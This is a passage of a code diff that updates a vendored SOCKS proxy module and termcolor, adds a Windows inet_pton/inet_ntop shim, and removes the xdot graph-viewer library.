+ return _orig_socket_ctor(*args, **kwargs) + + module.socket.socket = guarded_socket + + if _defaultproxy[0] == PROXY_TYPE_SOCKS4: + # Note: unable to prevent DNS leakage in SOCKS4 (Reference: https://security.stackexchange.com/a/171280) + pass + else: + module.socket.create_connection = create_connection else: raise GeneralProxyError((4, "no proxy specified")) def unwrapmodule(module): - module.socket.socket = socket.socket - module.socket.create_connection = socket.create_connection + module.socket.socket = _orgsocket + module.socket.create_connection = _orgcreateconnection class socksocket(socket.socket): """socksocket([family[, type[, proto]]]) -> socket object @@ -180,23 +207,23 @@ def __negotiatesocks5(self, destaddr, destport): # We'll receive the server's response to determine which # method was selected chosenauth = self.__recvall(2) - if chosenauth[0:1] != chr(0x05).encode(): + if chosenauth[0:1] != b'\x05': self.close() raise GeneralProxyError((1, _generalerrors[1])) # Check the chosen authentication method - if chosenauth[1:2] == chr(0x00).encode(): + if chosenauth[1:2] == b'\x00': # No authentication is required pass - elif chosenauth[1:2] == chr(0x02).encode(): + elif chosenauth[1:2] == b'\x02': # Okay, we need to perform a basic username/password # authentication. - self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.__proxy[5])) + self.__proxy[5]) + self.sendall(b'\x01' + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode()) authstat = self.__recvall(2) - if authstat[0:1] != chr(0x01).encode(): + if authstat[0:1] != b'\x01': # Bad response self.close() raise GeneralProxyError((1, _generalerrors[1])) - if authstat[1:2] != chr(0x00).encode(): + if authstat[1:2] != b'\x00': # Authentication failed self.close() raise Socks5AuthError((3, _socks5autherrors[3])) @@ -204,7 +231,7 @@ def __negotiatesocks5(self, destaddr, destport): else: # Reaching here is always bad self.close() - if chosenauth[1] == chr(0xFF).encode(): + if chosenauth[1:2] == b'\xff': raise Socks5AuthError((2, _socks5autherrors[2])) else: raise GeneralProxyError((1, _generalerrors[1])) @@ -214,13 +241,13 @@ def __negotiatesocks5(self, destaddr, destport): # use the IPv4 address request even if remote resolving was specified. try: ipaddr = socket.inet_aton(destaddr) - req = req + chr(0x01).encode() + ipaddr + req = req + b'\x01' + ipaddr except socket.error: # Well it's not an IP number, so it's probably a DNS name. 
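# Illustrative sketch, not part of the patch: how the patched wrapmodule() above is
# typically driven. setdefaultproxy() and PROXY_TYPE_SOCKS5 belong to this SocksiPy
# module; the vendored import path, the target module and the proxy address are
# assumptions made for the example only.
from thirdparty.socks import socks
import ftplib

socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 1080, rdns=True)
socks.wrapmodule(ftplib)   # guarded_socket() proxies only AF_INET/AF_INET6 stream sockets;
                           # create_connection() is replaced too, except for SOCKS4 (DNS leak)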
if self.__proxy[3]: # Resolve remotely ipaddr = None - req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + destaddr + req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + (destaddr if isinstance(destaddr, bytes) else destaddr.encode()) else: # Resolve locally ipaddr = socket.inet_aton(socket.gethostbyname(destaddr)) diff --git a/thirdparty/termcolor/termcolor.py b/thirdparty/termcolor/termcolor.py index f11b824b287..ddea6dd59f2 100644 --- a/thirdparty/termcolor/termcolor.py +++ b/thirdparty/termcolor/termcolor.py @@ -79,6 +79,11 @@ )) ) +COLORS.update(dict(("light%s" % color, COLORS[color] + 60) for color in COLORS)) + +# Reference: https://misc.flogisoft.com/bash/tip_colors_and_formatting +COLORS["lightgrey"] = 37 +COLORS["darkgrey"] = 90 RESET = '\033[0m' diff --git a/thirdparty/wininetpton/__init__.py b/thirdparty/wininetpton/__init__.py new file mode 100644 index 00000000000..5ea298dc195 --- /dev/null +++ b/thirdparty/wininetpton/__init__.py @@ -0,0 +1,10 @@ +#!/usr/bin/env python +# +# Copyright Ryan Vennell +# +# This software released into the public domain. Anyone is free to copy, +# modify, publish, use, compile, sell, or distribute this software, +# either in source code form or as a compiled binary, for any purpose, +# commercial or non-commercial, and by any means. + +pass diff --git a/thirdparty/wininetpton/win_inet_pton.py b/thirdparty/wininetpton/win_inet_pton.py new file mode 100644 index 00000000000..50ae621e53b --- /dev/null +++ b/thirdparty/wininetpton/win_inet_pton.py @@ -0,0 +1,85 @@ +#!/usr/bin/env python +# This software released into the public domain. Anyone is free to copy, +# modify, publish, use, compile, sell, or distribute this software, +# either in source code form or as a compiled binary, for any purpose, +# commercial or non-commercial, and by any means. + +import socket +import ctypes +import os + + +class sockaddr(ctypes.Structure): + _fields_ = [("sa_family", ctypes.c_short), + ("__pad1", ctypes.c_ushort), + ("ipv4_addr", ctypes.c_byte * 4), + ("ipv6_addr", ctypes.c_byte * 16), + ("__pad2", ctypes.c_ulong)] + +if hasattr(ctypes, 'windll'): + WSAStringToAddressA = ctypes.windll.ws2_32.WSAStringToAddressA + WSAAddressToStringA = ctypes.windll.ws2_32.WSAAddressToStringA +else: + def not_windows(): + raise SystemError( + "Invalid platform. ctypes.windll must be available." 
+ ) + WSAStringToAddressA = not_windows + WSAAddressToStringA = not_windows + + +def inet_pton(address_family, ip_string): + addr = sockaddr() + addr.sa_family = address_family + addr_size = ctypes.c_int(ctypes.sizeof(addr)) + + if WSAStringToAddressA( + ip_string, + address_family, + None, + ctypes.byref(addr), + ctypes.byref(addr_size) + ) != 0: + raise socket.error(ctypes.FormatError()) + + if address_family == socket.AF_INET: + return ctypes.string_at(addr.ipv4_addr, 4) + if address_family == socket.AF_INET6: + return ctypes.string_at(addr.ipv6_addr, 16) + + raise socket.error('unknown address family') + + +def inet_ntop(address_family, packed_ip): + addr = sockaddr() + addr.sa_family = address_family + addr_size = ctypes.c_int(ctypes.sizeof(addr)) + ip_string = ctypes.create_string_buffer(128) + ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string)) + + if address_family == socket.AF_INET: + if len(packed_ip) != ctypes.sizeof(addr.ipv4_addr): + raise socket.error('packed IP wrong length for inet_ntoa') + ctypes.memmove(addr.ipv4_addr, packed_ip, 4) + elif address_family == socket.AF_INET6: + if len(packed_ip) != ctypes.sizeof(addr.ipv6_addr): + raise socket.error('packed IP wrong length for inet_ntoa') + ctypes.memmove(addr.ipv6_addr, packed_ip, 16) + else: + raise socket.error('unknown address family') + + if WSAAddressToStringA( + ctypes.byref(addr), + addr_size, + None, + ip_string, + ctypes.byref(ip_string_size) + ) != 0: + raise socket.error(ctypes.FormatError()) + + return ip_string[:ip_string_size.value - 1] + +# Adding our two functions to the socket library +if os.name == 'nt': + socket.inet_pton = inet_pton + socket.inet_ntop = inet_ntop diff --git a/thirdparty/xdot/__init__.py b/thirdparty/xdot/__init__.py deleted file mode 100644 index c1a869589f3..00000000000 --- a/thirdparty/xdot/__init__.py +++ /dev/null @@ -1,19 +0,0 @@ -#!/usr/bin/env python -# -# Copyright 2008-2009 Jose Fonseca -# -# This program is free software: you can redistribute it and/or modify it -# under the terms of the GNU Lesser General Public License as published -# by the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public License -# along with this program. If not, see . -# - -pass diff --git a/thirdparty/xdot/xdot.py b/thirdparty/xdot/xdot.py deleted file mode 100644 index 4bc94640e0f..00000000000 --- a/thirdparty/xdot/xdot.py +++ /dev/null @@ -1,2159 +0,0 @@ -#!/usr/bin/env python -# -# Copyright 2008 Jose Fonseca -# -# This program is free software: you can redistribute it and/or modify it -# under the terms of the GNU Lesser General Public License as published -# by the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public License -# along with this program. If not, see . 
-# - -'''Visualize dot graphs via the xdot Format.''' - -__author__ = "Jose Fonseca" - -__version__ = "0.4" - - -import os -import sys -import subprocess -import math -import colorsys -import time -import re - -import gobject -import gtk -import gtk.gdk -import gtk.keysyms -import cairo -import pango -import pangocairo - - -# See http://www.graphviz.org/pub/scm/graphviz-cairo/plugin/cairo/gvrender_cairo.c - -# For pygtk inspiration and guidance see: -# - http://mirageiv.berlios.de/ -# - http://comix.sourceforge.net/ - - -class Pen: - """Store pen attributes.""" - - def __init__(self): - # set default attributes - self.color = (0.0, 0.0, 0.0, 1.0) - self.fillcolor = (0.0, 0.0, 0.0, 1.0) - self.linewidth = 1.0 - self.fontsize = 14.0 - self.fontname = "Times-Roman" - self.dash = () - - def copy(self): - """Create a copy of this pen.""" - pen = Pen() - pen.__dict__ = self.__dict__.copy() - return pen - - def highlighted(self): - pen = self.copy() - pen.color = (1, 0, 0, 1) - pen.fillcolor = (1, .8, .8, 1) - return pen - - -class Shape: - """Abstract base class for all the drawing shapes.""" - - def __init__(self): - pass - - def draw(self, cr, highlight=False): - """Draw this shape with the given cairo context""" - raise NotImplementedError - - def select_pen(self, highlight): - if highlight: - if not hasattr(self, 'highlight_pen'): - self.highlight_pen = self.pen.highlighted() - return self.highlight_pen - else: - return self.pen - - -class TextShape(Shape): - - #fontmap = pangocairo.CairoFontMap() - #fontmap.set_resolution(72) - #context = fontmap.create_context() - - LEFT, CENTER, RIGHT = -1, 0, 1 - - def __init__(self, pen, x, y, j, w, t): - Shape.__init__(self) - self.pen = pen.copy() - self.x = x - self.y = y - self.j = j - self.w = w - self.t = t - - def draw(self, cr, highlight=False): - - try: - layout = self.layout - except AttributeError: - layout = cr.create_layout() - - # set font options - # see http://lists.freedesktop.org/archives/cairo/2007-February/009688.html - context = layout.get_context() - fo = cairo.FontOptions() - fo.set_antialias(cairo.ANTIALIAS_DEFAULT) - fo.set_hint_style(cairo.HINT_STYLE_NONE) - fo.set_hint_metrics(cairo.HINT_METRICS_OFF) - try: - pangocairo.context_set_font_options(context, fo) - except TypeError: - # XXX: Some broken pangocairo bindings show the error - # 'TypeError: font_options must be a cairo.FontOptions or None' - pass - - # set font - font = pango.FontDescription() - font.set_family(self.pen.fontname) - font.set_absolute_size(self.pen.fontsize*pango.SCALE) - layout.set_font_description(font) - - # set text - layout.set_text(self.t) - - # cache it - self.layout = layout - else: - cr.update_layout(layout) - - descent = 2 # XXX get descender from font metrics - - width, height = layout.get_size() - width = float(width)/pango.SCALE - height = float(height)/pango.SCALE - # we know the width that dot thinks this text should have - # we do not necessarily have a font with the same metrics - # scale it so that the text fits inside its box - if width > self.w: - f = self.w / width - width = self.w # equivalent to width *= f - height *= f - descent *= f - else: - f = 1.0 - - if self.j == self.LEFT: - x = self.x - elif self.j == self.CENTER: - x = self.x - 0.5*width - elif self.j == self.RIGHT: - x = self.x - width - else: - assert 0 - - y = self.y - height + descent - - cr.move_to(x, y) - - cr.save() - cr.scale(f, f) - cr.set_source_rgba(*self.select_pen(highlight).color) - cr.show_layout(layout) - cr.restore() - - if 0: # DEBUG - # show where dot 
thinks the text should appear - cr.set_source_rgba(1, 0, 0, .9) - if self.j == self.LEFT: - x = self.x - elif self.j == self.CENTER: - x = self.x - 0.5*self.w - elif self.j == self.RIGHT: - x = self.x - self.w - cr.move_to(x, self.y) - cr.line_to(x+self.w, self.y) - cr.stroke() - - -class EllipseShape(Shape): - - def __init__(self, pen, x0, y0, w, h, filled=False): - Shape.__init__(self) - self.pen = pen.copy() - self.x0 = x0 - self.y0 = y0 - self.w = w - self.h = h - self.filled = filled - - def draw(self, cr, highlight=False): - cr.save() - cr.translate(self.x0, self.y0) - cr.scale(self.w, self.h) - cr.move_to(1.0, 0.0) - cr.arc(0.0, 0.0, 1.0, 0, 2.0*math.pi) - cr.restore() - pen = self.select_pen(highlight) - if self.filled: - cr.set_source_rgba(*pen.fillcolor) - cr.fill() - else: - cr.set_dash(pen.dash) - cr.set_line_width(pen.linewidth) - cr.set_source_rgba(*pen.color) - cr.stroke() - - -class PolygonShape(Shape): - - def __init__(self, pen, points, filled=False): - Shape.__init__(self) - self.pen = pen.copy() - self.points = points - self.filled = filled - - def draw(self, cr, highlight=False): - x0, y0 = self.points[-1] - cr.move_to(x0, y0) - for x, y in self.points: - cr.line_to(x, y) - cr.close_path() - pen = self.select_pen(highlight) - if self.filled: - cr.set_source_rgba(*pen.fillcolor) - cr.fill_preserve() - cr.fill() - else: - cr.set_dash(pen.dash) - cr.set_line_width(pen.linewidth) - cr.set_source_rgba(*pen.color) - cr.stroke() - - -class LineShape(Shape): - - def __init__(self, pen, points): - Shape.__init__(self) - self.pen = pen.copy() - self.points = points - - def draw(self, cr, highlight=False): - x0, y0 = self.points[0] - cr.move_to(x0, y0) - for x1, y1 in self.points[1:]: - cr.line_to(x1, y1) - pen = self.select_pen(highlight) - cr.set_dash(pen.dash) - cr.set_line_width(pen.linewidth) - cr.set_source_rgba(*pen.color) - cr.stroke() - - -class BezierShape(Shape): - - def __init__(self, pen, points, filled=False): - Shape.__init__(self) - self.pen = pen.copy() - self.points = points - self.filled = filled - - def draw(self, cr, highlight=False): - x0, y0 = self.points[0] - cr.move_to(x0, y0) - for i in xrange(1, len(self.points), 3): - x1, y1 = self.points[i] - x2, y2 = self.points[i + 1] - x3, y3 = self.points[i + 2] - cr.curve_to(x1, y1, x2, y2, x3, y3) - pen = self.select_pen(highlight) - if self.filled: - cr.set_source_rgba(*pen.fillcolor) - cr.fill_preserve() - cr.fill() - else: - cr.set_dash(pen.dash) - cr.set_line_width(pen.linewidth) - cr.set_source_rgba(*pen.color) - cr.stroke() - - -class CompoundShape(Shape): - - def __init__(self, shapes): - Shape.__init__(self) - self.shapes = shapes - - def draw(self, cr, highlight=False): - for shape in self.shapes: - shape.draw(cr, highlight=highlight) - - -class Url(object): - - def __init__(self, item, url, highlight=None): - self.item = item - self.url = url - if highlight is None: - highlight = set([item]) - self.highlight = highlight - - -class Jump(object): - - def __init__(self, item, x, y, highlight=None): - self.item = item - self.x = x - self.y = y - if highlight is None: - highlight = set([item]) - self.highlight = highlight - - -class Element(CompoundShape): - """Base class for graph nodes and edges.""" - - def __init__(self, shapes): - CompoundShape.__init__(self, shapes) - - def get_url(self, x, y): - return None - - def get_jump(self, x, y): - return None - - -class Node(Element): - - def __init__(self, x, y, w, h, shapes, url): - Element.__init__(self, shapes) - - self.x = x - self.y = y - - self.x1 = x - 
0.5*w - self.y1 = y - 0.5*h - self.x2 = x + 0.5*w - self.y2 = y + 0.5*h - - self.url = url - - def is_inside(self, x, y): - return self.x1 <= x and x <= self.x2 and self.y1 <= y and y <= self.y2 - - def get_url(self, x, y): - if self.url is None: - return None - #print (x, y), (self.x1, self.y1), "-", (self.x2, self.y2) - if self.is_inside(x, y): - return Url(self, self.url) - return None - - def get_jump(self, x, y): - if self.is_inside(x, y): - return Jump(self, self.x, self.y) - return None - - -def square_distance(x1, y1, x2, y2): - deltax = x2 - x1 - deltay = y2 - y1 - return deltax*deltax + deltay*deltay - - -class Edge(Element): - - def __init__(self, src, dst, points, shapes): - Element.__init__(self, shapes) - self.src = src - self.dst = dst - self.points = points - - RADIUS = 10 - - def get_jump(self, x, y): - if square_distance(x, y, *self.points[0]) <= self.RADIUS*self.RADIUS: - return Jump(self, self.dst.x, self.dst.y, highlight=set([self, self.dst])) - if square_distance(x, y, *self.points[-1]) <= self.RADIUS*self.RADIUS: - return Jump(self, self.src.x, self.src.y, highlight=set([self, self.src])) - return None - - -class Graph(Shape): - - def __init__(self, width=1, height=1, shapes=(), nodes=(), edges=()): - Shape.__init__(self) - - self.width = width - self.height = height - self.shapes = shapes - self.nodes = nodes - self.edges = edges - - def get_size(self): - return self.width, self.height - - def draw(self, cr, highlight_items=None): - if highlight_items is None: - highlight_items = () - cr.set_source_rgba(0.0, 0.0, 0.0, 1.0) - - cr.set_line_cap(cairo.LINE_CAP_BUTT) - cr.set_line_join(cairo.LINE_JOIN_MITER) - - for shape in self.shapes: - shape.draw(cr) - for edge in self.edges: - edge.draw(cr, highlight=(edge in highlight_items)) - for node in self.nodes: - node.draw(cr, highlight=(node in highlight_items)) - - def get_url(self, x, y): - for node in self.nodes: - url = node.get_url(x, y) - if url is not None: - return url - return None - - def get_jump(self, x, y): - for edge in self.edges: - jump = edge.get_jump(x, y) - if jump is not None: - return jump - for node in self.nodes: - jump = node.get_jump(x, y) - if jump is not None: - return jump - return None - - -class XDotAttrParser: - """Parser for xdot drawing attributes. 
- See also: - - http://www.graphviz.org/doc/info/output.html#d:xdot - """ - - def __init__(self, parser, buf): - self.parser = parser - self.buf = self.unescape(buf) - self.pos = 0 - - self.pen = Pen() - self.shapes = [] - - def __nonzero__(self): - return self.pos < len(self.buf) - - def unescape(self, buf): - buf = buf.replace('\\"', '"') - buf = buf.replace('\\n', '\n') - return buf - - def read_code(self): - pos = self.buf.find(" ", self.pos) - res = self.buf[self.pos:pos] - self.pos = pos + 1 - while self.pos < len(self.buf) and self.buf[self.pos].isspace(): - self.pos += 1 - return res - - def read_number(self): - return int(self.read_code()) - - def read_float(self): - return float(self.read_code()) - - def read_point(self): - x = self.read_number() - y = self.read_number() - return self.transform(x, y) - - def read_text(self): - num = self.read_number() - pos = self.buf.find("-", self.pos) + 1 - self.pos = pos + num - res = self.buf[pos:self.pos] - while self.pos < len(self.buf) and self.buf[self.pos].isspace(): - self.pos += 1 - return res - - def read_polygon(self): - n = self.read_number() - p = [] - for i in range(n): - x, y = self.read_point() - p.append((x, y)) - return p - - def read_color(self): - # See http://www.graphviz.org/doc/info/attrs.html#k:color - c = self.read_text() - c1 = c[:1] - if c1 == '#': - hex2float = lambda h: float(int(h, 16)/255.0) - r = hex2float(c[1:3]) - g = hex2float(c[3:5]) - b = hex2float(c[5:7]) - try: - a = hex2float(c[7:9]) - except (IndexError, ValueError): - a = 1.0 - return r, g, b, a - elif c1.isdigit() or c1 == ".": - # "H,S,V" or "H S V" or "H, S, V" or any other variation - h, s, v = map(float, c.replace(",", " ").split()) - r, g, b = colorsys.hsv_to_rgb(h, s, v) - a = 1.0 - return r, g, b, a - else: - return self.lookup_color(c) - - def lookup_color(self, c): - try: - color = gtk.gdk.color_parse(c) - except ValueError: - pass - else: - s = 1.0/65535.0 - r = color.red*s - g = color.green*s - b = color.blue*s - a = 1.0 - return r, g, b, a - - try: - dummy, scheme, index = c.split('/') - r, g, b = brewer_colors[scheme][int(index)] - except (ValueError, KeyError): - pass - else: - s = 1.0/255.0 - r = r*s - g = g*s - b = b*s - a = 1.0 - return r, g, b, a - - sys.stderr.write("unknown color '%s'\n" % c) - return None - - def parse(self): - s = self - - while s: - op = s.read_code() - if op == "c": - color = s.read_color() - if color is not None: - self.handle_color(color, filled=False) - elif op == "C": - color = s.read_color() - if color is not None: - self.handle_color(color, filled=True) - elif op == "S": - # http://www.graphviz.org/doc/info/attrs.html#k:style - style = s.read_text() - if style.startswith("setlinewidth("): - lw = style.split("(")[1].split(")")[0] - lw = float(lw) - self.handle_linewidth(lw) - elif style in ("solid", "dashed"): - self.handle_linestyle(style) - elif op == "F": - size = s.read_float() - name = s.read_text() - self.handle_font(size, name) - elif op == "T": - x, y = s.read_point() - j = s.read_number() - w = s.read_number() - t = s.read_text() - self.handle_text(x, y, j, w, t) - elif op == "E": - x0, y0 = s.read_point() - w = s.read_number() - h = s.read_number() - self.handle_ellipse(x0, y0, w, h, filled=True) - elif op == "e": - x0, y0 = s.read_point() - w = s.read_number() - h = s.read_number() - self.handle_ellipse(x0, y0, w, h, filled=False) - elif op == "L": - points = self.read_polygon() - self.handle_line(points) - elif op == "B": - points = self.read_polygon() - self.handle_bezier(points, filled=False) 
- elif op == "b": - points = self.read_polygon() - self.handle_bezier(points, filled=True) - elif op == "P": - points = self.read_polygon() - self.handle_polygon(points, filled=True) - elif op == "p": - points = self.read_polygon() - self.handle_polygon(points, filled=False) - else: - sys.stderr.write("unknown xdot opcode '%s'\n" % op) - break - - return self.shapes - - def transform(self, x, y): - return self.parser.transform(x, y) - - def handle_color(self, color, filled=False): - if filled: - self.pen.fillcolor = color - else: - self.pen.color = color - - def handle_linewidth(self, linewidth): - self.pen.linewidth = linewidth - - def handle_linestyle(self, style): - if style == "solid": - self.pen.dash = () - elif style == "dashed": - self.pen.dash = (6, ) # 6pt on, 6pt off - - def handle_font(self, size, name): - self.pen.fontsize = size - self.pen.fontname = name - - def handle_text(self, x, y, j, w, t): - self.shapes.append(TextShape(self.pen, x, y, j, w, t)) - - def handle_ellipse(self, x0, y0, w, h, filled=False): - if filled: - # xdot uses this to mean "draw a filled shape with an outline" - self.shapes.append(EllipseShape(self.pen, x0, y0, w, h, filled=True)) - self.shapes.append(EllipseShape(self.pen, x0, y0, w, h)) - - def handle_line(self, points): - self.shapes.append(LineShape(self.pen, points)) - - def handle_bezier(self, points, filled=False): - if filled: - # xdot uses this to mean "draw a filled shape with an outline" - self.shapes.append(BezierShape(self.pen, points, filled=True)) - self.shapes.append(BezierShape(self.pen, points)) - - def handle_polygon(self, points, filled=False): - if filled: - # xdot uses this to mean "draw a filled shape with an outline" - self.shapes.append(PolygonShape(self.pen, points, filled=True)) - self.shapes.append(PolygonShape(self.pen, points)) - - -EOF = -1 -SKIP = -2 - - -class ParseError(Exception): - - def __init__(self, msg=None, filename=None, line=None, col=None): - self.msg = msg - self.filename = filename - self.line = line - self.col = col - - def __str__(self): - return ':'.join([str(part) for part in (self.filename, self.line, self.col, self.msg) if part != None]) - - -class Scanner: - """Stateless scanner.""" - - # should be overriden by derived classes - tokens = [] - symbols = {} - literals = {} - ignorecase = False - - def __init__(self): - flags = re.DOTALL - if self.ignorecase: - flags |= re.IGNORECASE - self.tokens_re = re.compile( - '|'.join(['(' + regexp + ')' for type, regexp, test_lit in self.tokens]), - flags - ) - - def next(self, buf, pos): - if pos >= len(buf): - return EOF, '', pos - mo = self.tokens_re.match(buf, pos) - if mo: - text = mo.group() - type, regexp, test_lit = self.tokens[mo.lastindex - 1] - pos = mo.end() - if test_lit: - type = self.literals.get(text, type) - return type, text, pos - else: - c = buf[pos] - return self.symbols.get(c, None), c, pos + 1 - - -class Token: - - def __init__(self, type, text, line, col): - self.type = type - self.text = text - self.line = line - self.col = col - - -class Lexer: - - # should be overriden by derived classes - scanner = None - tabsize = 8 - - newline_re = re.compile(r'\r\n?|\n') - - def __init__(self, buf = None, pos = 0, filename = None, fp = None): - if fp is not None: - try: - fileno = fp.fileno() - length = os.path.getsize(fp.name) - import mmap - except: - # read whole file into memory - buf = fp.read() - pos = 0 - else: - # map the whole file into memory - if length: - # length must not be zero - buf = mmap.mmap(fileno, length, access = 
mmap.ACCESS_READ) - pos = os.lseek(fileno, 0, 1) - else: - buf = '' - pos = 0 - - if filename is None: - try: - filename = fp.name - except AttributeError: - filename = None - - self.buf = buf - self.pos = pos - self.line = 1 - self.col = 1 - self.filename = filename - - def next(self): - while True: - # save state - pos = self.pos - line = self.line - col = self.col - - type, text, endpos = self.scanner.next(self.buf, pos) - assert pos + len(text) == endpos - self.consume(text) - type, text = self.filter(type, text) - self.pos = endpos - - if type == SKIP: - continue - elif type is None: - msg = 'unexpected char ' - if text >= ' ' and text <= '~': - msg += "'%s'" % text - else: - msg += "0x%X" % ord(text) - raise ParseError(msg, self.filename, line, col) - else: - break - return Token(type = type, text = text, line = line, col = col) - - def consume(self, text): - # update line number - pos = 0 - for mo in self.newline_re.finditer(text, pos): - self.line += 1 - self.col = 1 - pos = mo.end() - - # update column number - while True: - tabpos = text.find('\t', pos) - if tabpos == -1: - break - self.col += tabpos - pos - self.col = ((self.col - 1)//self.tabsize + 1)*self.tabsize + 1 - pos = tabpos + 1 - self.col += len(text) - pos - - -class Parser: - - def __init__(self, lexer): - self.lexer = lexer - self.lookahead = self.lexer.next() - - def match(self, type): - if self.lookahead.type != type: - raise ParseError( - msg = 'unexpected token %r' % self.lookahead.text, - filename = self.lexer.filename, - line = self.lookahead.line, - col = self.lookahead.col) - - def skip(self, type): - while self.lookahead.type != type: - self.consume() - - def consume(self): - token = self.lookahead - self.lookahead = self.lexer.next() - return token - - -ID = 0 -STR_ID = 1 -HTML_ID = 2 -EDGE_OP = 3 - -LSQUARE = 4 -RSQUARE = 5 -LCURLY = 6 -RCURLY = 7 -COMMA = 8 -COLON = 9 -SEMI = 10 -EQUAL = 11 -PLUS = 12 - -STRICT = 13 -GRAPH = 14 -DIGRAPH = 15 -NODE = 16 -EDGE = 17 -SUBGRAPH = 18 - - -class DotScanner(Scanner): - - # token regular expression table - tokens = [ - # whitespace and comments - (SKIP, - r'[ \t\f\r\n\v]+|' - r'//[^\r\n]*|' - r'/\*.*?\*/|' - r'#[^\r\n]*', - False), - - # Alphanumeric IDs - (ID, r'[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff]*', True), - - # Numeric IDs - (ID, r'-?(?:\.[0-9]+|[0-9]+(?:\.[0-9]*)?)', False), - - # String IDs - (STR_ID, r'"[^"\\]*(?:\\.[^"\\]*)*"', False), - - # HTML IDs - (HTML_ID, r'<[^<>]*(?:<[^<>]*>[^<>]*)*>', False), - - # Edge operators - (EDGE_OP, r'-[>-]', False), - ] - - # symbol table - symbols = { - '[': LSQUARE, - ']': RSQUARE, - '{': LCURLY, - '}': RCURLY, - ',': COMMA, - ':': COLON, - ';': SEMI, - '=': EQUAL, - '+': PLUS, - } - - # literal table - literals = { - 'strict': STRICT, - 'graph': GRAPH, - 'digraph': DIGRAPH, - 'node': NODE, - 'edge': EDGE, - 'subgraph': SUBGRAPH, - } - - ignorecase = True - - -class DotLexer(Lexer): - - scanner = DotScanner() - - def filter(self, type, text): - # TODO: handle charset - if type == STR_ID: - text = text[1:-1] - - # line continuations - text = text.replace('\\\r\n', '') - text = text.replace('\\\r', '') - text = text.replace('\\\n', '') - - text = text.replace('\\r', '\r') - text = text.replace('\\n', '\n') - text = text.replace('\\t', '\t') - text = text.replace('\\', '') - - type = ID - - elif type == HTML_ID: - text = text[1:-1] - type = ID - - return type, text - - -class DotParser(Parser): - - def __init__(self, lexer): - Parser.__init__(self, lexer) - self.graph_attrs = {} - self.node_attrs = {} - 
self.edge_attrs = {} - - def parse(self): - self.parse_graph() - self.match(EOF) - - def parse_graph(self): - if self.lookahead.type == STRICT: - self.consume() - self.skip(LCURLY) - self.consume() - while self.lookahead.type != RCURLY: - self.parse_stmt() - self.consume() - - def parse_subgraph(self): - id = None - if self.lookahead.type == SUBGRAPH: - self.consume() - if self.lookahead.type == ID: - id = self.lookahead.text - self.consume() - if self.lookahead.type == LCURLY: - self.consume() - while self.lookahead.type != RCURLY: - self.parse_stmt() - self.consume() - return id - - def parse_stmt(self): - if self.lookahead.type == GRAPH: - self.consume() - attrs = self.parse_attrs() - self.graph_attrs.update(attrs) - self.handle_graph(attrs) - elif self.lookahead.type == NODE: - self.consume() - self.node_attrs.update(self.parse_attrs()) - elif self.lookahead.type == EDGE: - self.consume() - self.edge_attrs.update(self.parse_attrs()) - elif self.lookahead.type in (SUBGRAPH, LCURLY): - self.parse_subgraph() - else: - id = self.parse_node_id() - if self.lookahead.type == EDGE_OP: - self.consume() - node_ids = [id, self.parse_node_id()] - while self.lookahead.type == EDGE_OP: - node_ids.append(self.parse_node_id()) - attrs = self.parse_attrs() - for i in range(0, len(node_ids) - 1): - self.handle_edge(node_ids[i], node_ids[i + 1], attrs) - elif self.lookahead.type == EQUAL: - self.consume() - self.parse_id() - else: - attrs = self.parse_attrs() - self.handle_node(id, attrs) - if self.lookahead.type == SEMI: - self.consume() - - def parse_attrs(self): - attrs = {} - while self.lookahead.type == LSQUARE: - self.consume() - while self.lookahead.type != RSQUARE: - name, value = self.parse_attr() - attrs[name] = value - if self.lookahead.type == COMMA: - self.consume() - self.consume() - return attrs - - def parse_attr(self): - name = self.parse_id() - if self.lookahead.type == EQUAL: - self.consume() - value = self.parse_id() - else: - value = 'true' - return name, value - - def parse_node_id(self): - node_id = self.parse_id() - if self.lookahead.type == COLON: - self.consume() - port = self.parse_id() - if self.lookahead.type == COLON: - self.consume() - compass_pt = self.parse_id() - else: - compass_pt = None - else: - port = None - compass_pt = None - # XXX: we don't really care about port and compass point values when parsing xdot - return node_id - - def parse_id(self): - self.match(ID) - id = self.lookahead.text - self.consume() - return id - - def handle_graph(self, attrs): - pass - - def handle_node(self, id, attrs): - pass - - def handle_edge(self, src_id, dst_id, attrs): - pass - - -class XDotParser(DotParser): - - def __init__(self, xdotcode): - lexer = DotLexer(buf = xdotcode) - DotParser.__init__(self, lexer) - - self.nodes = [] - self.edges = [] - self.shapes = [] - self.node_by_name = {} - self.top_graph = True - - def handle_graph(self, attrs): - if self.top_graph: - try: - bb = attrs['bb'] - except KeyError: - return - - if not bb: - return - - xmin, ymin, xmax, ymax = map(float, bb.split(",")) - - self.xoffset = -xmin - self.yoffset = -ymax - self.xscale = 1.0 - self.yscale = -1.0 - # FIXME: scale from points to pixels - - self.width = xmax - xmin - self.height = ymax - ymin - - self.top_graph = False - - for attr in ("_draw_", "_ldraw_", "_hdraw_", "_tdraw_", "_hldraw_", "_tldraw_"): - if attr in attrs: - parser = XDotAttrParser(self, attrs[attr]) - self.shapes.extend(parser.parse()) - - def handle_node(self, id, attrs): - try: - pos = attrs['pos'] - except KeyError: - 
